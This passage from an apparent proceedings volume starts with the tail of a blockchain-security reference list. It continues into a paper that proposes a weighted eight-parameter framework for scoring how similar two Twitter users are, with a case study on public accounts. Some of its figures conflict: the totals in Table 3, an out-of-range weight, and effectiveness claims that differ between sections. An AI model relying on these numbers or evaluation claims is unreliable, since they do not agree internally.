Dec 2019. https://doi.org/10.21533/pen.v7i4.935
13. Conti, M., Sandeep Kumar, E., Lal, C., & Ruj, S. (2018). A survey on security and privacy
issues of bitcoin. In IEEE Communications Surveys & Tutorials (Vol. 20, No. 4, pp. 3416–3452),
Fourthquarter 2018. https://doi.org/10.1109/COMST.2018.2842460
14. Li, X., Jiang, P., Chen, T., Luo, X., & Wen, Q. A survey on the security of blockchain systems.
Future Generation Computer Systems, 107, 841–853. ISSN 0167-739X
15. Dasgupta, D., Shrein, J. M., & Gupta, K. D. (2019). A survey of blockchain from security
perspective. Journal of Banking and Financial Technology, 3, 1–17. https://doi.org/10.1007/
s42786-018-00002-6
16. Jokić, S., Cvetković, A. S., Adamović, S., Ristić, N., & Spalević, P. (2019). Comparative
analysis of cryptocurrency wallets vs traditional wallets. Proceedings of International Journal
for Economic Theory and Practice and Social Issues, Oct 2019, https://scindeks-clanci.ceon.
rs/data/pdf/0350-137X/2019/0350-137X1903065J.pdf
17. Latifa, E.-R., Ahemed, E. K. M., Mohamed, E. G., & Omar, A. Blockchain: bitcoin
wallet cryptography security, challenges and countermeasures. Journal of Internet Banking
and Commerce. https://www.icommercecentral.com/open-access/blockchain-bitcoin-wallet-
cryptography-security-challenges-and-countermeasures.php?aid=86561
18. Aydar, M., Cetin, S., Ayvaz, S., & Aygun, B. (2020). Private key encryption and recovery in
blockchain. Submitted on 9 Jul 2019 (v1), last revised 25 Jun 2020 (this version, v2).
19. Sun, S.-F., Au, M. H., Liu, J. K., & Yuen, T. H., (2017). RingCT 2.0: A compact accumulator-
based (linkable ring signature) protocol for blockchain cryptocurrency monero. In Proc. Eur.
Symp. Res. Comput. Secur. (pp. 456–474).
20. https://cointelegraph.com/news/14b-in-crypto-stolen-in-first-five-months-of-2020-says-cip
hertrace. Accessed on Oct. 21, 2020.
21. Rezaeighaleh, H., & Zou, C. C. (2019). New secure approach to backup cryptocurrency wallets.
In 2019 IEEE Global Communications Conference (GLOBECOM), Waikoloa, HI, USA (pp. 1–
6). https://doi.org/10.1109/GLOBECOM38437.2019.9014007
22. https://ledgerops.com/blog/2019-03-28-top-five-blockchain-security-issues-in-2019.
Accessed on Oct. 16, 2020.
23. Kaushal, P. K., Bagga, A., & Sobti, R. (2017). Evolution of bitcoin and security risk in bitcoin
wallets. In 2017 International Conference on Computer, Communications and Electronics
(Comptelix), Jaipur (pp. 172–177). https://doi.org/10.1109/COMPTELIX.2017.8003959
24. Wang, H., Wang, Y., Cao, Z., Li, Z., Xiong, G. (2019). An overview of blockchain security
analysis. In: X. Yun, et al. (eds.). Cyber Security. CNCERT 2018, Communications in Computer
and Information Science (Vol. 970). Springer. https://doi.org/10.1007/978-981-13-6621-5_5
https://www.bleepingcomputer.com/news/security/iota-cryptocurrency-users-lose-4-million-
in-clever-phishing-attack/. Accessed on Oct. 23, 2020.
26. Breitner, J., Heninger, N. (2019). Biased Nonce sense: Lattice attacks against weak ECDSA
signatures in cryptocurrencies. In: I. Goldberg, T. Moore (eds.). Financial cryptography and
data security. FC 2019. Lecture Notes in Computer Science (Vol. 11598). Cham: Springer.
https://doi.org/10.1007/978-3-030-32101-7_1
27. https://www.internetsociety.org/blog/2017/11/roca-encryption-vulnerability. Accessed on Oct.
21, 2020.
28. https://www.zdnet.com/article/upbit-cryptocurrency-exchange-loses-48-5-million-to-hackers.
Accessed on Oct. 21, 2020.

29. Gan, S. (2017). An IoT simulator in NS3 and a key based authentication architecture for IoT
devices using blockchain. Indian Institute of Technology, Kanpur (online). https://security.cse.
iitk.ac.in/node/240. Accessed on Oct. 21, 2020.
30. Salman, T., Zolanvari, M., Erbad, A., Jain, R., & Samaka, M. (2019). Security services using
blockchains: A state-of-the-art survey. In IEEE Communications Surveys & Tutorials (Vol. 21,
No. 1, pp. 858–880), Firstquarter. https://doi.org/10.1109/COMST.2018.2863956
31. Matsumoto, S., Reischuk, R. M. (2017). IKP: turning a PKI around with decentralized auto-
mated incentives. In 2017 IEEE Symposium on Security and Privacy, SP, San Jose, CA
(pp. 410–426).
32. Guardtime. (2017). Internet of Things authentication: A blockchain solution using SRAM phys-
ical unclonable functions (online). https://www.intrinsic-id.com/wpcontent/uploads/2017/05/
gt_KSIPUF-web-1611pdf. Accessed on Oct. 21, 2020.
33. He, S., et al. (2018). A social-network-based cryptocurrency wallet-management scheme. IEEE
Access, 6, 7654–7663. https://doi.org/10.1109/ACCESS.2018.2799385
34. Litke, P., & Stewart, J. (2014). Cryptocurrency-stealing malware landscape (Online). Available
https://www.secureworks.com/research/cryptocurrency-stealing-malware-landscape
35. M. Team. Multibit. Available: https://multibit.org. Accessed on Oct. 21, 2020.
36. Wuille. P. (2020).Bip32: Hierarchical deterministic wallets. Available: https://github.com/gen
jix/bips/blob/master/bip0032.md. Accessed on Oct. 2, 2020.
37. Vasek, M., Bonneau, J., Ryan Castellucci, C. K., & Moore, T. (2016). The Bitcoin brain drain:
A short paper on the use and abuse of Bitcoin brain wallets. In Financial Cryptography and
Data Security (Lecture Notes in Computer Science). New York, NY, USA: Springer.
38. Wang, N., Chen, Y., Yang, Y., Fang, Z. & Sun, Y. (2019). Blockchain private key storage
algorithm based on image information hiding. https://doi.org/10.1007/978-3-030-24268-8_50
39. Biswas, C., Gupta, U. D., & Haque, M. M. (2019). An efficient algorithm for confiden-
tiality, integrity and authentication using hybrid cryptography and steganography. In 2019
International Conference on Electrical, Computer and Communication Engineering (ECCE),
Cox’sBazar, Bangladesh (pp. 1–5). https://doi.org/10.1109/ECACE.2019.8679136
40. Rashmi, N., & Jyothi, K. (2018). An improved method for reversible data hiding steganography
combined with cryptography (pp. 81–84). https://doi.org/10.1109/ICISC.2018.8398946
41. Kumar, R., & Singh, N. (2020). A survey based on enhanced the security of image using the
combined techniques of steganography and cryptography (March 29, 2020). In Proceedings of
the International Conference on Innovative Computing & Communications (ICICC), Available
at SSRN: https://ssrn.com/abstract=3563571
42. Chauhan, S., Jyotsna, Kumar, J., & Doegar, A. (2017). Multiple layer text security using vari-
able block size cryptography and image steganography. In 2017 3rd International Conference
on Computational Intelligence & Communication Technology (CICT), Ghaziabad (pp. 1–7).
https://doi.org/10.1109/CIACT.2017.7977303
43. Hosam, O. (2018). Hiding bitcoins in steganographic fractals (pp. 512–519). https://doi.org/
10.1109/ISSPIT.2018.8642736
44. Boiangiu, C.-A., & Morosan, A., & Stan, M. (2015). Fractal objects in computer graphics.
45. Ma, H., & Sun, G. (2020). Blockchain-based group key management scheme in IoT. In D.
S. Huang, V. Bevilacqua, A. Hussain (eds.). Intelligent Computing Theories and Application.
ICIC 2020. Lecture Notes in Computer Science (Vol. 12463). Cham: Springer. https://doi.org/
10.1007/978-3-030-60799-9_39
46. Tian, Y., Wang, Z., Xiong, J., & Ma, J. (2020). A blockchain-based secure key management
scheme with trustworthiness in DWSNs. IEEE Transactions on Industrial Informatics, 16(9),
6193–6202. https://doi.org/10.1109/TII.2020.2965975
47. Zhu, F., et al. (2017). Trust your wallet: A new online wallet architecture for Bitcoin. In
2017 International Conference on Progress in Informatics and Computing (PIC), Nanjing
(pp. 307–311). https://doi.org/10.1109/PIC.2017.8359562
48. Engelmann, C., Scott, S. L., Leangsuksun, C., & He, X. (2008). Symmetric active/active high
availability for high-performance computing system services: Accomplishments and limita-
tions. In 2008 Eighth IEEE International Symposium on Cluster Computing and the Grid
(CCGRID) (pp. 813–818).

49. Tschorsch, F., & Scheuermann, B. (2016). Bitcoin and beyond: A technical survey on decen-
tralized digital currencies. IEEE Communications Surveys & Tutorials, 18(3), 2084–2123.
50. Alqahtani, H., Kavakli-Thorne, M., & Kumar, G. (2019). Applications of Generative Adver-
sarial Networks (GANs): An updated Review. Arch Computat Methods Eng. https://doi.org/
10.1007/s11831-019-09388-y
51. https://ciphertrace.com/spring-2020-cryptocurrency-anti-money-laundering-report. Accessed
on Oct. 21, 2020.
52. https://in.reuters.com/article/us-crypto-currency-crime/cryptocurrency-thefts-scams-hit-1-7-
billion-in-2018-report-idINKCN1PN1SQ. Accessed on Oct. 17, 2020.
53. https://www.cnbc.com/2019/01/29/crime-still-plague-cryptocurrencies-as-1point7-billion-
was-stolen-last-year-.html. Accessed on Oct. 19.
A Contextual Framework to Find
Similarity Between Users on Twitter

Sonika Dahiya, Gaurav Kumar, and Arnav Yadav

Abstract Twitter is one of the most used social networking sites, and people usually prefer to share information about themselves, their views, and other things they are interested in on Twitter. The proposed method can be used by the average Twitter user to find out how similar they are to any other user on the platform. The presented framework finds the similarity between any two users on Twitter based on eight parameters: mention similarity, common interest, topic and list similarity, follower and following relationship similarity, retweets, likes, common hashtags, and profile similarity. Each parameter generates a score, and the score of each parameter is independent of the other parameter scores. A weight is assigned to each parameter according to the score it obtains individually, and the value of each weight lies between 0 and 1. Each parameter requires user data, such as followers, retweets, likes, and hashtags, that have been extracted using Twitter's own API. For each Twitter user, data for the eight parameters are collected from October 2019 to October 2020. The framework can be used to suggest how similar two users on Twitter are. It has been verified using datasets of five users, from which percentage similarity is calculated. To assess the effectiveness of the framework, the result of our case study was compared against a survey of human judges consisting of 524 people and was found to be moderately effective.

Keywords Similar interests · Parameters · Weights · Twitter · Similarity · Retweets · Hashtags · Twitter API · Profile · Social media

S. Dahiya
CSE Department, Delhi Technological University, Delhi 110042, India
G. Kumar (B) · A. Yadav
SE Department, Delhi Technological University, Delhi 110042, India


1 Introduction

Nowadays, social networking platforms are an essential part of everyone's lives. Among their various uses, most people use them for communication and for staying informed. Currently, Twitter is one of the most used and popular social networking platforms. To get information about friends, celebrities, or a company, users follow them and read their tweets. Currently, Twitter has 1.35 billion registered users, and among them, 321 million are monthly active users; these users are responsible for publishing 500 million tweets every single day. In the last ten years, Twitter has gained a lot of popularity in comparison with other social networking sites because of the content that users post every day and the hidden patterns in that information.
A critical part of studying Twitter data goes into analyzing users' views and behavior. Computing the similarity of users based on their posted content, interests, and following and follower lists is a significant application of Twitter content analysis. Finding similarity between users can be used for security screening and hiring, and governments can use it to find people who have bad intentions toward the privacy of the general public, by identifying users with negative tendencies and character defects through comparison with other such users observed in the past. Companies can use this method to find similar users and thus curate specific advertisements for those users. Individuals could use it to find their degree of similarity to other users, or to find users who are interested in similar content and topics.
Previous work on finding similarity between Twitter users has focused mainly on parameters like common interests, likes, and retweets. In this paper, a few additional parameters have been added, such as follower and following relationship similarity, mention similarity, common hashtags, profile similarity, common interest, and topic and list similarity. Each parameter is assigned a weighting factor which is multiplied by the score calculated for that parameter. The weights are not decided by the user; rather, they are based on the parameter scores and are normalized in the range of 0 to 1. These new parameters make this technique more effective in computing similarity between users. As user data and behavior change frequently, the data for the parameters were collected for the last one year, from October 2019 to October 2020, using the Twitter API. The proposed framework asks the user to enter a user ID and returns a percentage score of how similar they are to the entered user's profile, computed with the proposed similarity formula.
The next sections first describe the work related to the system, especially in the field of similarity between users on Twitter, and then explain all eight parameters and their formulas. The paper ends with a case study, an evaluation of results, future work, and the conclusion. To assess the effectiveness of the proposed methodology, the result of the case study was compared against a survey which included 524 human judges, and the method was found to be 92.75% and 87.64% effective in the two cases studied.

2 Related Work

The active research pertaining to Twitter revolves around clustering users with similar
interests. This can be utilized in various fields such as finding online communities,
finding people with similar interests, and personalizing and curating advertisements
for users. In the following section, major related work of the last decade is discussed:
Goel et al. [1] formed a method of finding similar Twitter users using various parameters such as social graph structure, the popularity of the user, user interaction data, and content analysis. The created framework is scalable to users with large active followings and users with a small number of followers alike. Due to this scalability, the framework can find similar users for a very large number of users. A machine learning-based framework was proposed, which was built on Hadoop. A dataset of candidates was constructed using a graph-based cosine similarity algorithm, and then the candidates were ranked based on parameters using a logistic regression model trained on Twitter data from previous years. In contrast, the methodology presented in the present paper works only between two users and is not yet scalable to large datasets.
Razis et al. [2] formed a method for finding similarity between users on the basis
of their content. The metrics used were based on the combination of the four param-
eters, which are: URLs, mentions, hashtags, and the URL domains mentioned in the
user’s tweets. For calculating their final metric, they used scores that they got from
the similarity metric. The two important factors used were “followers to follower”
and “tweet creation rate.” The major areas this paper deals with are rating how much
influence a particular user account has, introducing an ontology for semantically describing Twitter entities, and describing a framework that finds similar accounts and their relation with other such accounts on Twitter. Some related parameters, in addition to a few new ones, are used in this paper to compute similarity.
Vathi et al. [3] described a methodology to find similar communities that works on a few similarity metrics based on the interactions users have on Twitter, such as the following relationship and the shared content. For the hashtags, a vector space model of TF-IDF weights is used. After combining all these similarities linearly, they generate the total similarity score. Along with the similarity scores, each parameter is assigned a weight. The weights are multiplied with the scores, and the summation of these scores gives the total similarity score.
Kamath et al. [4] propose a method of computing account similarity on RealGraph
using cosine similarity. Diverse interaction data are taken in by RealGraph, and it
then tries to predict possible user interaction in the time to come. The prediction
scores calculated by RealGraph are interpreted as the strength of the connection,
which allows a wide range of applications to use RealGraph. Who To Follow (WTF)
is an application of RealGraph, which is used by Twitter to suggest similar users
based on common interests and connections among users.
Dean and Ghemawat [5] use a variety of signals to compute a similarity score and then use MapReduce to process these signals. MapReduce takes a group of input key/value pairs and uses them to build a group of output key/value pairs. The MapReduce library expresses the computation as two separate functions: Map and Reduce. The user writes Map, which takes an input pair and produces a group of intermediate key/value pairs. This gives their formula high scalability. They let the users decide the weight assigned to each signal, as they believe similarity is subjective. In this paper, the weights assigned to the parameters are not decided by the user; instead, they are based on the score value of each parameter.

3 Proposed Framework

After examining the users' following, followers, tweets, retweets, interests, and some other parameters, a framework has been devised to quantify the similarity between users. This section describes all the parameter formulas for computing similarity between two users: the first being the input user and the other known as the test user. Every parameter has its respective formula to calculate the parameter score.
For every parameter score, weightage has been assigned between 0 and 1, accord-
ing to the scores that the input user and test user are getting using the formula. The
weights are then multiplied with their respective scores, and the summation gives us
the total similarity score. Using this score, we then find the percentage similarity of
the input user to the test user. Table 1 shows all the parameters that are being used
to find similarity and their definition. The following section describes the proposed
framework in further detail.

3.1 Parameter Weights

For every parameter, a weight is assigned, as not all parameters have equal importance in calculating the similarity score; for example, since liking is the most common activity, its weight is comparatively low, as it is not a very good indicator of similarity. The weight is assigned to a parameter based on the parameter similarity score it gets. The weights do not depend on anything else; they depend only on the score that the parameter gets.
The value of each weight lies between zero and one; this range is chosen so that a single weight does not dominate the final score. A weight close to one means the parameter has more weightage compared to the other parameters, and a weight close to zero means it has very little weightage. The weights will change according to the scores, which are updated as the data get updated.
Table 1 Formula used for each parameter similarity computation

Following and follower relationship similarity:
Sim_relationship(A_i, A_j) = 1 if the test user appears in one list, 2 if the test user appears in two lists, ..., up to p + q if the test user appears in all lists   (2)
where p is the number of A_i's followers and q is the number of A_i's following.

Mention similarity:
Sim_mention(A_i, A_j) = Σ_{l=1}^{w} [TwtsThrd(A_i, A_j) / ThrdTot(A_i, A_j)] × [1 / accntsTot(l, A_i)]   (3)
TwtsThrd: function that returns the total count of tweets in a thread where A_i has mentioned A_j. ThrdTot: count of total tweets in the given thread. accntsTot: gives the total count of users in the selected thread. w is the total number of threads taken into consideration.

Retweet similarity:
Sim_Retwt(A_i, A_j) = NoTwtsInRetwtList(A_i, A_j)   (4)
the number of tweets of A_j that A_i retweeted.

Like similarity:
Sim_Like(A_i, A_j) = NoTwtsInLikeList(A_i, A_j)   (5)
the number of tweets of A_j that A_i liked.

Common hashtag used:
Sim_Hashtag(A_i, A_j) = Σ_{l=1}^{w} 1 / (1 + Hashset(A_i, A_j, H_l))   (6)
Hashset(A_i, A_j, H) = |NUT(A_i, H) − NUT(A_j, H)| + |N(A_i, H) − N(A_j, H)| + |P(A_i, H) − P(A_j, H)|
P gives the count of positive tweets that a user has on a hashtag, N the count of negative tweets, and NUT the count of neutral tweets on the common hashtag. w gives the count of total hashtags that A_i and A_j have both used in their tweets.

Common interest:
Sim_Interest(A_i, A_j) = count(ints(A_i) ∩ ints(A_j))   (7)
ints does an analysis and gives the top five interests of the user.

Profile similarity:
Sim_Profile(A_i, A_j) = [gender(A_i) is equal to gender(A_j)] + [language(A_i) is equal to language(A_j)] + [location(A_i) is equal to location(A_j)]   (8)
gender gives the gender of the user, language the language of the user, and location where the user is located.

Topic and list similarity:
Sim_Topic(A_i, A_j) = numOfTopicandList(A_i, A_j)   (9)
the number of common topics and lists followed by both A_i and A_j.

3.2 Parameter Normalization

As all parameter similarity scores vary over different ranges, they have been rescaled to a common scale (between 0 and 10 in this framework), thus bringing all the values of the numeric columns in the dataset to the same range. This made the scores more consistent, so that the effect of each score would be about the same and the final result would depend mainly on
the weights of each parameter. This is a technique used to reduce data redundancy
and eliminate undesirable characteristics. The formula being used for normalization
is as follows:
y = [(x − min(k)) × (max(j) − min(j))] / (max(k) − min(k)) + min(j)   (1)

where
X is the value that is to be normalized.
min(k) is smallest value in the dataset.
max(k) is the maximum value in the dataset.
min( j) is the normalization range’s minimum value.
max( j) is the normalization range’s maximum value.
In this framework, x is the score obtained after applying each parameter formula individually, min(k) is the smallest value in the individual parameter data, max(k) is the largest value for each parameter, max(j) is 10, and min(j) is 0.
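Equation (1) is ordinary min–max rescaling. A minimal Python sketch, assuming the raw scores of one parameter are held in a plain list and using the target range [0, 10] stated above (the function name is hypothetical):

```python
def min_max_rescale(scores, new_min=0.0, new_max=10.0):
    """Rescale the raw scores of one parameter to a common range (Eq. 1)."""
    old_min, old_max = min(scores), max(scores)
    if old_max == old_min:                      # avoid division by zero for constant scores
        return [new_min for _ in scores]
    return [(x - old_min) * (new_max - new_min) / (old_max - old_min) + new_min
            for x in scores]

# Example: raw scores of one parameter for several test users.
print(min_max_rescale([3, 12, 7, 0]))           # -> [2.5, 10.0, 5.83..., 0.0]
```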

3.3 Formulation of Similarity Computation


Sim_Total(A_i, A_j) = Σ_{m=1}^{8} (Sim_m(A_i, A_j) × weight_m)

Input user (A_i): user whose similarity has to be found.
Test user (A_j): user to whom the similarity is being computed.
Sim_m: score produced by the m-th parameter for users A_i and A_j.
weight_m: weight assigned to the m-th parameter.
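A minimal sketch of this overall computation, assuming the normalized scores and weights are held in dictionaries keyed by parameter name; the conversion to a percentage against a maximum of 80 (eight parameters, each normalized to at most 10) is an assumption made here only for illustration, not a formula stated in the text.

```python
def total_similarity(norm_scores, weights):
    """Weighted sum of the eight normalized parameter scores (Sim_Total)."""
    return sum(norm_scores[p] * weights[p] for p in norm_scores)

def percentage_similarity(total, max_total=80.0):
    """Express the total score as a percentage; the maximum of 80 is an
    illustrative assumption (eight parameters, each at most 10)."""
    return 100.0 * total / max_total
```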

3.4 Parameters Used

This part shows all the parameters in detail that are used to find similarity between
two users.
Parameter 1: Followers and Following Relationship
The first parameter that is being used for determining the similarity score is the
follower and following relationship. The number of common accounts that both the input user and the test user follow is directly related to how similar their interests and views probably are. To compute this parameter, first make a list of the followers of every account in the following list of the input user, and another list of the accounts followed by every follower of the input user.
Once these lists are made, check the number of times the test user's account shows up in them. Every time the account shows up, it adds one point to the score for the parameter. If the input user has p followers and q following accounts, the total number of lists will be p + q; thus, if the test user's account shows up in every list, the maximum score will be p + q.
For example, in our case study dataset, the input user, @TomSegura, has 1400 fol-
lowers and 140 following profiles. This means a total of 1540 total lists exist where
the test user’s name has to be checked.
Parameter 2: Mentions
Similarity from mentions is one of the parameters that is being considered in the
proposed formula. If a user mentions another in their tweets, the chances of their
similarity relationship being strong are high. However, if multiple accounts are men-
tioned in the same tweet, this decreases the chance of them being strongly related.
Thus using the formulas shown in Table 1, the mention similarity score is calculated
according to the count of times an account is mentioned and the number of accounts
that are mentioned with it. For example, if Tom mentions an account in one of his
tweets, the number of times he mentions that account in that thread is divided by
the number of accounts mentioned in that particular thread to get the score for the
parameter.
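A sketch of one possible reading of Eq. (3), summed over a list of threads; each thread is assumed to be a list of tweets, and each tweet a dict with an 'author' field and a 'mentions' field (both are assumptions about the data layout, not the paper's actual representation).

```python
def mention_score(threads, input_user, test_user):
    """Mention similarity in the spirit of Eq. (3)."""
    score = 0.0
    for thread in threads:
        # Tweets in this thread where the input user mentions the test user.
        mentions = sum(1 for t in thread
                       if t["author"] == input_user and test_user in t["mentions"])
        # All accounts mentioned anywhere in the thread.
        accounts = {m for t in thread for m in t["mentions"]}
        if mentions and accounts:
            score += (mentions / len(thread)) * (1.0 / len(accounts))
    return score
```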
Parameter 3: Retweet Similarity
Retweet similarity is the next parameter in the similarity score calculation. A person
retweets someone’s tweet only if the content of that tweet resonates with them at
some level. This increases the chance that the two are similar. Hence for every tweet
of the test user that is retweeted by the input user, it adds one point to the parameter
score. Retweets were extracted using the Twitter API, and the number of times a
particular account’s tweets have been retweeted is the score of the parameter.
Parameter 4: Like Similarity
Like similarity is one of the parameters in the formula. If a user likes another user's tweet, it usually means they like the subject matter of that tweet; from this, it can be said that these users have something in common and there is a chance that they might have similar views. The similarity score of this parameter is calculated using the formula, and a point is added for every tweet of the test user liked by the input user. As liking posts on Twitter is a very common activity, a rather small weight is assigned to this parameter to give it less importance. Likes were extracted using the Twitter API, and the number of times a particular account's tweets have been liked by the input user is the score of the parameter.
Parameter 5: Common Hashtags
In this parameter, all the tweets using common hashtags are selected. After getting all
the tweets, sentiment analysis is done. Through that, a negative, neutral, and positive
score is generated for the tweet. Tweets from both the accounts are compared, and the
ones with common hashtags are extracted. Then, sentiment analysis is done on the
text to see if the content of the tweet is positive, negative, or neutral using Stanford
Core NLP, as both users’ viewpoints may not be the same. The final score of the
parameter is then calculated using the formula in the table.
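The paper performs the sentiment step with Stanford CoreNLP; the sketch below substitutes NLTK's VADER analyzer purely for illustration and assumes the tweets are already grouped per user and per hashtag. The difference-based Hashset term follows the formula given in Table 1.

```python
# Requires: nltk and the VADER lexicon (nltk.download('vader_lexicon')).
from nltk.sentiment.vader import SentimentIntensityAnalyzer  # stand-in for Stanford CoreNLP

_analyzer = SentimentIntensityAnalyzer()

def sentiment_label(text):
    """Map a tweet to 'pos', 'neg' or 'neu' using VADER's compound score."""
    c = _analyzer.polarity_scores(text)["compound"]
    return "pos" if c > 0.05 else "neg" if c < -0.05 else "neu"

def hashtag_score(tweets_i, tweets_j, common_hashtags):
    """Hashtag similarity (Eq. 6): hashtags on which the two users' sentiment
    distributions differ little contribute more to the score.

    tweets_i / tweets_j map each hashtag to the list of that user's tweet texts.
    """
    score = 0.0
    for h in common_hashtags:
        counts = []
        for tweets in (tweets_i, tweets_j):
            labels = [sentiment_label(t) for t in tweets.get(h, [])]
            counts.append({s: labels.count(s) for s in ("pos", "neg", "neu")})
        hashset = sum(abs(counts[0][s] - counts[1][s]) for s in ("pos", "neg", "neu"))
        score += 1.0 / (1.0 + hashset)
    return score
```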
Parameter 6: Common Interests
Common interests is one of the parameters being used to determine the score for
similarity. Text for each user’s tweets is extracted, and then the topmost used words
are found. These words were then checked in a dictionary containing words related
to topics and subtopics such as politics, entertainment, literature, area, and cooking,
and the person’s top five interests are obtained. The top five interests of both accounts
are then compared, and each matching interest accounts for one point; this gives us
the score for the common interest parameter.
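A sketch of the interest-matching step; the small topic dictionary below is a hypothetical stand-in for the themed word lists the paper relies on [7].

```python
from collections import Counter
import re

# Hypothetical topic dictionary; the actual one is built from themed word lists [7].
TOPIC_WORDS = {
    "politics": {"election", "senate", "policy", "vote"},
    "entertainment": {"podcast", "comedy", "movie", "show"},
    "cooking": {"recipe", "kitchen", "baking"},
}

def top_interests(tweets, k=5):
    """Return the user's top-k topics based on keyword frequency in their tweets."""
    words = Counter(w for t in tweets for w in re.findall(r"[a-z']+", t.lower()))
    topic_hits = Counter({topic: sum(words[w] for w in kws)
                          for topic, kws in TOPIC_WORDS.items()})
    return {topic for topic, n in topic_hits.most_common(k) if n > 0}

def interest_score(tweets_i, tweets_j):
    """Common-interest similarity (Eq. 7): size of the intersection of top interests."""
    return len(top_interests(tweets_i) & top_interests(tweets_j))
```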
Parameter 7: Profile Similarity
Profile similarity is one of the parameters being used to determine the final similarity score. It consists of three factors: location, gender, and language. As the profile's gender information is not obtainable through Twitter, it was inferred from the person's name, and the language information was derived from the language usually used in the tweets. Each matching factor contributes one point to the parameter score.
Parameter 8: Topic and List Similarity
The topic similarity parameter counts the number of topics followed by both the input user and the test user. A higher number of topics followed by both users indicates a higher similarity in the content consumed by both on a regular basis. Each common topic contributes one point to the score. The same is done for the lists followed by both. The final score is then the sum of the number of common topics and lists followed by the users.

4 Results and Analysis

For simulation of proposed framework, the code is written in Python 3.9.0 in Jupyter
Notebook 5.7.4 with the hardware specification as GPU: Intel Iris Plus Graphics 645
1536 MB, processor: Quad-Core Intel Core i5 Processor, speed: 1.4 GHz, number of
processors: 1, and total number of cores: 4.

4.1 Data Extraction

As mentioned earlier, eight parameters are being used to find the similarity between
users. Every parameter generates some score, but for getting the score, data need to
be extracted to work upon. For each user, data for the eight parameters are extracted for a one-year period using Twitter's API: the extracted data cover October 2019 to October 2020. Some of the APIs that are used are listed below.

1. Followers API
2. Liked tweet API
3. Retweet API.
The Twitter API enables programmatic access to Twitter in advanced and flexible ways. It is used to analyze, learn from, and interact with tweets.
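A minimal sketch of the extraction step with the Tweepy client (v3-style method names, which differ in later Tweepy versions); the credentials and the screen name are placeholders.

```python
import tweepy  # assumes Tweepy 3.x; several method names changed in Tweepy 4.x

auth = tweepy.OAuthHandler("CONSUMER_KEY", "CONSUMER_SECRET")      # placeholder credentials
auth.set_access_token("ACCESS_TOKEN", "ACCESS_TOKEN_SECRET")
api = tweepy.API(auth, wait_on_rate_limit=True)

screen_name = "TomSegura"  # example input user from the case study

follower_ids = api.followers_ids(screen_name=screen_name)          # Followers API
friend_ids = api.friends_ids(screen_name=screen_name)              # accounts the user follows
liked_tweets = api.favorites(screen_name)                          # Liked tweet API
timeline = api.user_timeline(screen_name=screen_name, count=200, tweet_mode="extended")
retweets = [t for t in timeline if hasattr(t, "retweeted_status")]  # retweets in the timeline
```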

4.2 Case Study

Measuring similarity among users of social media is a rather demanding task, as their similarity needs to be judged based on the content that they have posted or shared on their social media site; moreover, the users need to be active users on Twitter. Nevertheless, the method should work for any average user on Twitter, as it depends only on their dataset.
To demonstrate this, a varied set of accounts have been selected from the fields of
entertainment and politics to create a diverse group for our dataset. Each input user
has been compared to the three test users individually, and their percentage similarity
is computed using the parameter scores and the weights assigned to each parameter.
The results of this case study were then compared to a survey of human judges who
decided the similarity of the accounts by arranging them in a descending order of
similarity. We compared this to a similar list made using the percentage similarities
calculated using our proposed methodology, the results of which were found to be
promising.
For analyzing if the method is correct, it has been applied on 2 input users and 3
test users. In this case, the 2 input users are:
@TomSegura—Tom Segura Jr. is a stand-up comedian, writer, and podcaster.
- https://en.wikipedia.org/wiki/TomSegura.
@JoeBiden—Joe Biden is an American politician serving as the 46th and current
president of the USA.
- https://en.wikipedia.org/wiki/JoeBiden
And 3 test users are:
@BertKreischer—Bert Kreischer is a stand-up comedian and reality television
host
- https://en.wikipedia.org/wiki/BertKreischer
@Seanseaevans—Sean Evans is an American producer and YouTuber who is
best recognized for the series Hot Ones.
- https://en.wikipedia.org/wiki/SeanEvans.

Table 2 Dataset of users for case study

Input users       Test users
@TomSegura        @BertKreischer
@JoeBiden         @SeanEvans
                  @KamalaHarris

@KamalaHarris—Kamala Harris is an American attorney and politician who is the 49th and current vice president of the USA.
- https://en.wikipedia.org/wiki/KamalaHarris
The accounts used in the case study are summarized in Table 2.
Table 3 shows the percentage similarity of @TomSegura and @JoeBiden with
@BertKreischer, @SeanEvans, and @KamalaHarris. Through the case study, we observe that people from the same industry are more similar to each other. In Table 3, Norms score denotes the normalized score and Wts score the score after applying the weight.

4.3 Result and Evaluation

This paper presents a system to calculate the percentage similarity of two users on
Twitter. This system takes the profile IDs of the users and finds their similarity. If two users are 25–45% similar, this means they are quite similar in their content. In our case study, Tom and Bert are from the same industry and work together on certain projects, so they should be similar to each other, which is verified by the result that they are 33.5% similar; this means they are similar users. For the second input user, @JoeBiden, it is apparent that he would have a high similarity percentage to @KamalaHarris's account, as they work closely together and talk about very similar subjects on Twitter.
Using this method, the conclusion reached is that @JoeBiden's account is 44.44% similar to @KamalaHarris' account. On the other hand, on comparing with @BertKreischer's account, a value of 8.02% is justified, as they are from completely different professions and engage in very different topics of conversation on Twitter. Similarly, @TomSegura and @KamalaHarris are not from the same industry either, and so their similarity score of 11.40% is also justified. Hence, it is visible now that this method is effective for finding similarities between Twitter users.
The parameters have been designed in such a way that they can easily be used on other similar social media Web sites. For example, Twitter accounts can be replaced by Instagram, Facebook, or Snapchat accounts. Tweets can be substituted for profile bios. In our methodology, "likes" and "shares" from Facebook can be considered the same as "favorites" and "retweets," while concepts such as mentions, hashtags, and replies have almost identical counterparts in these Web sites. Hence, with a few tweaks, this methodology can be used to calculate the percentage similarity of social media users on various other social media platforms.

Table 3 Percentage similarity score

                                      Tom, Bert          Tom, Sean          Tom, Kamala
Parameters                            Norms     Wts      Norms     Wts      Norms     Wts
Following and follower relationship   3.75      0.375    2         0.2      6.45      0.645
Mention similarity                    6.5       0.65     0         0        0         0
Retweet similarity                    0.43      0.043    0         0        0         0
Like similarity                       0.5       0.05     0.016     0.01     0         0
Hashtag similarity                    5         0.5      2         0.2      0.1       0.01
Common interest similarity            6         0.6      8         0.8      2         0.2
Profile similarity                    10        1        10        1        6.6       0.66
Topic similarity                      7.14      0.714    2.8       0.28     0         0
Total score                           26.81              17.76              8.91
Percentage similarity                 33.5%              22.2%              11.14%

                                      Joe, Bert          Joe, Sean          Joe, Kamala
Parameters                            Norms     Wts      Norms     Wts      Norms     Wts
Following and follower relationship   1.9       0.19     1.5       0.15     8.3       0.83
Mention similarity                    0         0        0         0        6.76      0.676
Retweet similarity                    0         0        0         0        1.2       0.12
Like similarity                       0         0        0         0        0         0
Hashtag similarity                    1         0        0.1       0.01     10        1
Common interest similarity            4         0.4      4         0.4      10        1
Profile similarity                    6         0.6      6         6.6      3.3       0.33
Topic similarity                      0         0        0         0        3.3       0.33
Total score                           6.417              6.191              35.55
